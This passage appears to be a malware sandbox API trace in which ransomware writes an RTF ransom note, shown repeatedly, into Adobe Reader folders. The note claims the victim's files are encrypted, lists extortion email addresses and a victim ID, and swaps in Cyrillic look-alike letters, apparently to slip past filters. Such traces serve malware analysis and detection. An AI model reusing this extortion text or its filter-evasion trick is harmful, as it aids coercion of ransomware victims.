c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.543] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.544] CloseHandle (hObject=0x1fc) returned 1 [0064.544] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\bg85_info.rtf")) returned 0xffffffff [0064.545] GetLastError () returned 0x2 [0064.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HUN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\hun\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.545] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 